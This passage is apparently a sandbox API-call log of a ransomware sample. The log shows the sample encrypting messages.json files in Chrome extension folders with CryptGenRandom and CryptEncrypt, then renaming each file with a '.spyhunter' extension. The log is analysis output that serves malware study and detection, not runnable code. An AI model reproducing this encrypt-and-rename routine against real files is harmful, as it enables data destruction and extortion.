RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.371] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.spyhunter") returned 168 [0136.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_GB\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_gb\\messages.json.spyhunter")) returned 1 [0136.372] GetProcessHeap () returned 0x2c0000 [0136.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.372] GetProcessHeap () returned 0x2c0000 [0136.372] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.373] GetProcessHeap () returned 0x2c0000 [0136.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6e1a0 | out: hHeap=0x2c0000) returned 1 [0136.374] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2d8 | out: pbBuffer=0x25cf2d8) returned 1 [0136.374] GetProcessHeap () returned 0x2c0000 [0136.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.374] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2d0*=0x30) returned 1 [0136.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json") returned 155 [0136.375] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.375] GetProcessHeap () returned 0x2c0000 [0136.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.375] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf294*=0x104, lpOverlapped=0x0) returned 1 [0136.376] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.376] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x25cf294, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf294*=0x104, lpOverlapped=0x0) returned 1 [0136.376] GetProcessHeap () returned 0x2c0000 [0136.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.376] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.376] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf294, lpOverlapped=0x0 | out: lpBuffer=0x25cf2d4*, lpNumberOfBytesWritten=0x25cf294*=0x4, lpOverlapped=0x0) returned 1 [0136.376] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf294, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf294*=0x30, lpOverlapped=0x0) returned 1 [0136.377] CloseHandle (hObject=0x180) returned 1 [0136.377] GetProcessHeap () returned 0x2c0000 [0136.377] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.377] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.spyhunter") returned 165 [0136.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\el\\messages.json.spyhunter")) returned 1 [0136.378] GetProcessHeap () returned 0x2c0000 [0136.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.378] GetProcessHeap () returned 0x2c0000 [0136.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.378] GetProcessHeap () returned 0x2c0000 [0136.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6de90 | out: hHeap=0x2c0000) returned 1 [0136.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2d0 | out: pbBuffer=0x25cf2d0) returned 1 [0136.379] GetProcessHeap () returned 0x2c0000 [0136.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2c8*=0x30) returned 1 [0136.379] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0136.380] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.380] GetProcessHeap () returned 0x2c0000 [0136.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.380] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf28c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf28c*=0xd9, lpOverlapped=0x0) returned 1 [0136.402] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.402] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x25cf28c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf28c*=0xd9, lpOverlapped=0x0) returned 1 [0136.402] GetProcessHeap () returned 0x2c0000 [0136.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.402] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.402] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf28c, lpOverlapped=0x0 | out: lpBuffer=0x25cf2cc*, lpNumberOfBytesWritten=0x25cf28c*=0x4, lpOverlapped=0x0) returned 1 [0136.402] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf28c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf28c*=0x30, lpOverlapped=0x0) returned 1 [0136.402] CloseHandle (hObject=0x180) returned 1 [0136.403] GetProcessHeap () returned 0x2c0000 [0136.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.403] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.spyhunter") returned 165 [0136.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.spyhunter")) returned 1 [0136.403] GetProcessHeap () returned 0x2c0000 [0136.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.404] GetProcessHeap () returned 0x2c0000 [0136.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.404] GetProcessHeap () returned 0x2c0000 [0136.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2c0 | out: pbBuffer=0x25cf2c0) returned 1 [0136.577] GetProcessHeap () returned 0x2c0000 [0136.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2b8*=0x30) returned 1 [0136.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.604] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json") returned 155 [0136.604] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.604] GetProcessHeap () returned 0x2c0000 [0136.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.604] ReadFile (in: hFile=0x180, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf27c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf27c*=0xf5, lpOverlapped=0x0) returned 1 [0136.605] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.605] WriteFile (in: hFile=0x180, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x25cf27c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf27c*=0xf5, lpOverlapped=0x0) returned 1 [0136.605] GetProcessHeap () returned 0x2c0000 [0136.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.605] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.606] WriteFile (in: hFile=0x180, lpBuffer=0x25cf2bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf27c, lpOverlapped=0x0 | out: lpBuffer=0x25cf2bc*, lpNumberOfBytesWritten=0x25cf27c*=0x4, lpOverlapped=0x0) returned 1 [0136.606] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf27c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf27c*=0x30, lpOverlapped=0x0) returned 1 [0136.606] CloseHandle (hObject=0x180) returned 1 [0136.606] GetProcessHeap () returned 0x2c0000 [0136.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.606] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.spyhunter") returned 165 [0136.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0136.607] GetProcessHeap () returned 0x2c0000 [0136.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.607] GetProcessHeap () returned 0x2c0000 [0136.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.607] GetProcessHeap () returned 0x2c0000 [0136.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6d9f8 | out: hHeap=0x2c0000) returned 1 [0136.608] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2b8 | out: pbBuffer=0x25cf2b8) returned 1 [0136.608] GetProcessHeap () returned 0x2c0000 [0136.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.608] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2b0*=0x30) returned 1 [0136.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0136.657] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json") returned 155 [0136.657] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.657] GetProcessHeap () returned 0x2c0000 [0136.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0136.657] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf274*=0xeb, lpOverlapped=0x0) returned 1 [0136.658] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.658] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x25cf274, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf274*=0xeb, lpOverlapped=0x0) returned 1 [0136.658] GetProcessHeap () returned 0x2c0000 [0136.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0136.658] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.658] WriteFile (in: hFile=0xec, lpBuffer=0x25cf2b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf274, lpOverlapped=0x0 | out: lpBuffer=0x25cf2b4*, lpNumberOfBytesWritten=0x25cf274*=0x4, lpOverlapped=0x0) returned 1 [0136.659] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf274, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf274*=0x30, lpOverlapped=0x0) returned 1 [0136.659] CloseHandle (hObject=0xec) returned 1 [0136.659] GetProcessHeap () returned 0x2c0000 [0136.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.659] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.spyhunter") returned 165 [0136.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0136.660] GetProcessHeap () returned 0x2c0000 [0136.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.660] GetProcessHeap () returned 0x2c0000 [0136.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.660] GetProcessHeap () returned 0x2c0000 [0136.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6db80 | out: hHeap=0x2c0000) returned 1 [0136.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf2a8 | out: pbBuffer=0x25cf2a8) returned 1 [0136.725] GetProcessHeap () returned 0x2c0000 [0136.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.726] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf2a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf2a0*=0x30) returned 1 [0136.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0136.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json") returned 155 [0136.726] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.726] GetProcessHeap () returned 0x2c0000 [0136.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0136.727] ReadFile (in: hFile=0x18c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf264*=0xfe, lpOverlapped=0x0) returned 1 [0136.728] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.728] WriteFile (in: hFile=0x18c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x25cf264, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf264*=0xfe, lpOverlapped=0x0) returned 1 [0136.728] GetProcessHeap () returned 0x2c0000 [0136.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0136.728] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.728] WriteFile (in: hFile=0x18c, lpBuffer=0x25cf2a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf264, lpOverlapped=0x0 | out: lpBuffer=0x25cf2a4*, lpNumberOfBytesWritten=0x25cf264*=0x4, lpOverlapped=0x0) returned 1 [0136.728] WriteFile (in: hFile=0x18c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf264, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf264*=0x30, lpOverlapped=0x0) returned 1 [0136.728] CloseHandle (hObject=0x18c) returned 1 [0136.729] GetProcessHeap () returned 0x2c0000 [0136.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.729] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.spyhunter") returned 165 [0136.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0136.730] GetProcessHeap () returned 0x2c0000 [0136.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.730] GetProcessHeap () returned 0x2c0000 [0136.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 